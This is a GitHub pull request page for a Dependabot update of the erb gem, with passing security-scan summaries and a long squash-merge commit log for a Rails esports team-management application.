chore(deps): bump erb from 6.0.2 to 6.0.4#31
Merged
Conversation
Bumps [erb](https://github.com/ruby/erb) from 6.0.2 to 6.0.4. - [Release notes](https://github.com/ruby/erb/releases) - [Changelog](https://github.com/ruby/erb/blob/master/NEWS.md) - [Commits](ruby/erb@v6.0.2...v6.0.4) --- updated-dependencies: - dependency-name: erb dependency-version: 6.0.4 dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com>
dependabot
Bot
added
dependencies
Contributor
📦 Dependency Security Check✅ No known vulnerabilities found. View Report |
Up to standards ✅🟢 Issues
|
Contributor
🔒 Brakeman Security Scan
✅ No high confidence issues found. |
Contributor
🔍 Semgrep Static Analysis
|
Contributor
🔐 Security Scan SummaryStatic Analysis (SAST)
Dynamic Analysis (DAST)
✅ All security checks passed! |
Bulletdev
added a commit
that referenced
this pull request
May 8, 2026
* fix: solve canvas drag issues * feat: implement backfill job * fix: solve risk assessment issue * feat: implement allowed host 4 images * feat: implement aditional sec tests suites * chore: fix security lab workflow run * chore: update security workflow run * chore: update security workflow run * chore: update database 4 workflow run * docs: update readme and cookbooks * fix: solve sidekiq organization permission issue * chore: update ruby version for workflow run * docs: auto-update architecture diagram [skip ci] * fix: solve diagram workflow run setup * chore: fix diagram workflow run * fix: solve diagram router issues * fix: solve diaigram layer issues * docs: update deployment section with diagram * docs: update deployment setup and guideline * fix: update k6 load tests run * chore: update files reference * fix: update docker build context * fix: correct docker build contexts for Coolify * fix: update docker location for tests * Add FOSSA status badge to README * feat: implement aditional players stats * feat(db): add aditional feature labels * feat: implement retry after throttle * feat: implement codeql analysis * feat: implement aditional security tests * fix: solve sarif workflow run * fix: solve null bytes errors + backtrace * fix: solve invalid statement rescue issue * feat: implement aditional test scenarios * Fix repository URLs in CONTRIBUTING.md Updated GitHub repository URLs in contributing guidelines. * fix: solve multi-tenant issue * fix: solve scouting target player policy fix scouting target and bulk sync issues * feat: implement aditional SQLI tests * fix: solve semgrep false positive * fix: solve semgrep inline suppress * chore:Update Sidekiq descriptions in README.md * feat: implement aditional sec tests * Delete .pentest/reports/security-audit-2026-03-18.md * chore: update gitignore * choere: update cookbooks * chore: fix production build * feat: add ai intelligence module * fix: correct bugs found during test coverage expansion * test: expand rspec coverage across all modules * feat: implement internal messenger * feat: implement mailer contact form * fix: make mailer conditional * fix: solve mail logger warning * feat: implement feedback area * chore: rubocop linter fix * feat: implement ticket validation * feat: implement ticket/support * fix: solve register issues * fix: solve regex sem * chore: brakeman ignore adjust * feat: implement hire from scouting * fix: solve dependency issue * feat(db): implement scrims and inhouse * feat: implement scrims and inhouse * fix: solve rails dependency issue * feat: implement aditional active storage test * feat: implement inhouse * feat: add scrims feature to production * fix: solve zeitwerk scrims issues * fix: solve lobby serializer issue * chore: reduce code complexity and fix code style * fix: solve shell issues * fix: solve remaining linter issues * chore: improve linter and code coverage * chore: improve sec. test coverage * fix: solve remaining linter issues * fix: solve permission deny issue * fix: solve nginx conflict * fix: lobby 404, search indexing in sidekiq, nginx unprivileged * feat: implement inhouse integration * fix: solve RIOT ID string parsing * feat: improve inhouse features * chore: add custom inflection 2 zeitwerk * fix: solve traefik issue into compose * chore: adjust status page and safe list * feat: implement realtime scrims chat * feat: implement result report * feat: implement scrims live chat popup * feat: add logo upload 4 organizations * feat: add devops management scripts * fix: solve minors roster mismatchs * fix: adjust team logo serializer * feat: implement feedback template * feat: implement arenaBR free agents register * fix: solve arenaBR CORS issues * fix: adjust arenaBR CORS * fix: solve codacy warnings * feat: improve security lab tests coverage * fix: solve scrims public lobby display fix lobby for https://scrims.lol * chore: adjust dependencies fix: Rack::Session::Cookie incorrectly handles decryption failures when configured with secrets:. If cookie decryption fails, the implementation falls back to a default decoder instead of rejecting the cookie. This allows an unauthenticated attacker to supply a crafted session cookie that is accepted as valid session data without knowledge of any configured secret. This vulnerability affects Addressable >= 2.3.0 (note: 2.3.0 and 2.3.1 were yanked; the earliest installable release is 2.3.2). It was partially fixed in version 2.8.10 and fully remediated in 2.9.0. The vulnerability is more exploitable on MRI Ruby < 3.2 and on all versions of JRuby and TruffleRuby. MRI Ruby 3.2 and later ship with Onigmo 6.9, which introduces memoization that prevents catastrophic backtracking for the first class of template. JRuby and TruffleRuby do not implement equivalent memoization and remain vulnerable to all patterns * feat: implement schedule audit * feat: implement tournments module * docs: auto-update architecture diagram [skip ci] * fix: solve snyk issue * fix: solve hash id issue * fix: remove unused dependencies * fix: solve pro matches issue * fix: solve tournment bracket issues * feat: add team tag to organizations * fix: solve nightly workflow run issue * fix: solve bundler mismatch * fix: solve tournment bracket rules * fix: solve remainig nightly workflow issues * chore: adjust bracket generator rule mudança no gerador de bracket Razões técnicas: 1. Bracket management sequencial, admin libera uma rodada de cada vez, sem paralelo 2. Menos janela para atraso acumular 3. Times sabem exatamente quando vão jogar (sem "você pode jogar sexta E sábado dependendo de resultado") 4. O código suporta os dois, mas Modelo 2 é mais fácil de operar no MVP * feat: improve connection pooling * Remove duplicate badges in README.md Removed duplicate badges for Codacy and FOSSA. * feat: implement database test * feat: implement tier thresholds * chore: bump version to ruby 3.4.9 * chore: bump version to ruby 3.4.8 * feat: implement target season history * chore: Update database description * feat: implement CircuitBreaker + cache layer * docs: auto-update architecture diagram [skip ci] * chore: adjust api call to load test scenario * chore: use local database instead serverless * chore: adjust database conection * fix: solve sidekiq major outage * feat: implement go riot proxy * fix: solve mismatch into sync matchs * fix: solve zeitwrk issue into import matches * fix: solve heartbeat issue * feat: add discord duplicated warning * feat: implement gateway into api workflow * fix: solve matches scope mismatch * fix: solve internal schema issue * fix: solve migrations issue * fix: adjust schema idempotency * chore: improve code style fix minors codacy issues * chore: adjust rack attack by ip address * feat: implement mailing and templates * chore: adjust license and cookbooks * feat: implement pandascore * chore: adjust gateway integration * chore: improve build cache * feat: implement aud into payload O gateway valida jwt.WithAudience("prostaff-riot-gateway") no source Go, sem o aud no payload, rejeita sempre com 401 independente do secret estar correto * feat: implement multi roster * fix: solve migrations entrypoint * fix: solve sidekiq healthcheck * refactor: solve team comparison gaps * fix: solve period issue into comparison * fix: solve unscoped player issue * fix: adjust player policy * fix: solve org unscoped minor issue validações de unicidade (player_email, riot_puuid, riot_summoner_id) também rodam sem o scope, eliminando os 3x [SECURITY] falsos positivos, o CurrentAttributes é thread-safe e resetado automaticamente ao fim do request * fix: solve database port mapping * chore: improve match details * fix: solve import to roster issue método de classe privado só pode ser chamado sem receptor * fix: solve player import to roster issue o index mostra targets globais sem excluir signed por padrão. Após o import, o watchlist da org é destruído e o status vira signed, mas o endpoint continua retornando o player * refactor: extract MatchFilterQuery, cache invalidation, and security audit fixes - Extract match filters/sorting to MatchFilterQuery (app/queries/) - Add invalidate_cache helper to Cacheable concern - Add after_action cache invalidation on update/destroy in matches, players, tournaments controllers - Move paginate inside cache block in MatchesController to avoid unnecessary query on cache hit - Fix ScoutingPlayersController N+1: replace global includes with scoped org query after pagination - Standardize 6 analytics controllers with before_action :set_player - Decompose CompetitiveController#build_role_performance into 3 helpers, remove rubocop:disable - Move PERFORMANCE_ROLES constant before private section - Fix Semgrep nosemgrep placement in 3 email templates (password_reset x2, welcome) - Update README and PRD with 2026-04-21 security audit results (Brakeman 0, Semgrep 0, pentest 0 real findings * chore: improve api docs page improve to have a readme.io look and feel * fix: solve smtp issue and dead jobs 1. Healthcheck do Sidekiq (serviço sidekiq, antes do depends_on) 2. SMTP vars nos dois serviços (api e sidekiq) * fix: solve scraper match index issue * fix: solve healthcheck minor issue * fix: solve semgrep issues * feat: implement prostaff events phoenix/elixir - real-time Event Bus & WebSocket Hub * fix: solve req and telemetry issues * feat: implement pro match details painel completo de análise pré/pós jogo * docs: auto-update architecture diagram [skip ci] * docs: improve readability Removed redundant architecture section and consolidated module information in README. * docs: update architecture and dataflow * fix: solve scouting waitlist issue O ScoutingWatchlist já tinha belongs_to :organization só estava faltando o outro lado da associação no Organization. Uma causando System Error undefined method 'scouting_watchlists' for an instance of Organization * docs: auto-update architecture diagram [skip ci] * feat: implement observability * docs: update changelog * fix: solve filebeat issue * fix: solve single-query no vector builder. * fix: solve exact match mismatch * chore: adjust allowed host * fix: solve sidekiq admin minor issue * fix: sidekiq session issue O Rack::Session::Cookie precisa vir antes do mount para que o Sidekiq::Web tenha sessão disponível quando renderizar as paginas sem isso o login passa pelo Basic Auth mas o CSRF trava tudo logo em seguida * fix: solve rack session issue * chore: adjust sidekiq bypass O bypass é seguro porque o /sidekiq ja e protegido pelo Rack::Auth::Basic e ninguem chega nos assets sem autenticar primeiro. O default-src 'none' e correto para os endpoints JSON da API, mas nao faz sentido para uma UI web * fix: solve sidekiq allowed content * fix: solve aditional sidekiq csp * fix: solve CSP mismatch for sidekiq o Sidekiq já injeta seu próprio CSP permissivo com nonce — só precisamos não sobrescrever com o restritivo * fix: solve atomic conflict * fix: solve setlocal mismatch and upsert SET LOCAL só vale dentro de uma transação explícita, fora dela o Postgres ignora silenciosamente, SET sem LOCAL altera o timeout para toda a conexão (que volta ao pool depois do job, mas connections do Sidekiq são dedicadas, então o efeito é o esperado) * docs: update service links and add observability details Updated service links in the README to point to GitHub and added details for observability and monitoring. * fix: solve pro matches card issues * docs: Refactor architecture section in README Updated architecture section to use details summary format and removed redundant text. * docs: enhance deployment architecture Added internal JWT connections for Router and Sidekiq. * docs: revise competitive module details and formatting Updated competitive module references to include Grid.gg and improved formatting in the README. * feat: implement ProStaff ML Atualmente na ProStaff tenho um modelo próprio treinado de AI para recomendações do tipo "X é melhor que Y nesse contexto: - XGBoost para classificação binária (win/loss dado o draft + contexto) com dados tabulares, treina rápido em CPU - Matrix Factorization para sinergias implícitas (similar ao que o Netflix usa para recomendação) e descobre relações latentes entre campeões que o win rate bruto não captura - Embeddings de campeão treinados no seu próprio histórico (Word2Vec sobre sequências de picks), representação vetorial própria, mais rica que os vetores atuais baseados só em stats médios * docs: auto-update architecture diagram [skip ci] * docs: update to insert ML service * fix: solve map ML suggestions issue * docs: add Scraper API and related components Added new components for the Scraper API and its associated daemons, including health checks and data enrichment processes. * docs: Update enrichment descriptions * docs: update README with Mermaid Live Editor link * Update README.md * fix: solve BackfillJob issue * docs: auto-update architecture diagram [skip ci] * feat: add competitive name into org * chore(deps): bump erb from 6.0.2 to 6.0.4 (#31) Bumps [erb](https://github.com/ruby/erb) from 6.0.2 to 6.0.4. - [Release notes](https://github.com/ruby/erb/releases) - [Changelog](https://github.com/ruby/erb/blob/master/NEWS.md) - [Commits](ruby/erb@v6.0.2...v6.0.4) --- updated-dependencies: - dependency-name: erb dependency-version: 6.0.4 dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * docs: Update service links in README.md * docs: remove duplicated module architecture details Removed detailed module descriptions from the README. * docs: Fix formatting of project entries * feat: implement team chat * docs: auto-update architecture diagram [skip ci] * chore: add FK to avoid conflict * fix: solve database mismatch * fix: solve FK issue * chore: adjust test scheme * fix: solve team chat websocket issue * fix: solve messaging channel * docs: simplify architecture section Removed detailed module descriptions from the architecture section. * fix: solve promatches paginations issue * docs: auto-update architecture diagram [skip ci] * docs: simplify architecture section Removed detailed module descriptions from the architecture section. * fix: solve promatches search issue * docs: auto-update architecture diagram [skip ci] * fix: solve promatches search issue * Refactor README to eliminate redundancy Removed duplicate architecture section and cleaned up module list. * feat: implement draft simulator * docs: auto-update architecture diagram [skip ci] * fix: solve semgrep inline issues * fix: solve semgrep deploy alert * fix: solve Zeitwerk module nesting * fix: solve array render into draft * docs: Refactor architecture section in README.md * fix: solve scrims lobby issue * refactor: remove fantasy feature * feat: implement monitoring sources * feat: implement payment gateway * fix: solve dependency issue * fix: solve analytics dashboard issues * fix: solve linter issues * fix: solve stack trace audit * fix: update hostname whitelist * fix: solve dropdown override into docs * feat: implement monitoring templates --------- Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: github-actions[bot] <github-actions[bot]@users.noreply.github.com> Co-authored-by: Michael D. <michael.silva@plathanus.com.br> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Bumps erb from 6.0.2 to 6.0.4.
Release notes
Sourced from erb's releases.
Changelog
Sourced from erb's changelog.
Commits
4d2b45eVersion 6.0.49d017beProhibit def_method on marshal-loaded ERB instances9c8fa8aVersion 6.0.30ebc6aeBump rubygems/release-gem from 1.1.2 to 1.2.025a729aBump step-security/harden-runner from 2.15.0 to 2.16.19820802Bump actions/create-github-app-token from 2 to 32611366Bump lewagon/wait-on-check-action from 1.5.0 to 1.6.0890d87fUse github.token instead of missing MATZBOT_DEPENDABOT_MERGE_TOKEN secretafc32b6Fix dependabot auto-merge by using GH_TOKEN env var2fd0a6bfix: exclude some files from published gem (#108)Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting
@dependabot rebase.Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR:
@dependabot rebasewill rebase this PR@dependabot recreatewill recreate this PR, overwriting any edits that have been made to it@dependabot show <dependency name> ignore conditionswill show all of the ignore conditions of the specified dependency@dependabot ignore this major versionwill close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)@dependabot ignore this minor versionwill close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)@dependabot ignore this dependencywill close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)You can disable automated security fix PRs for this repo from the Security Alerts page.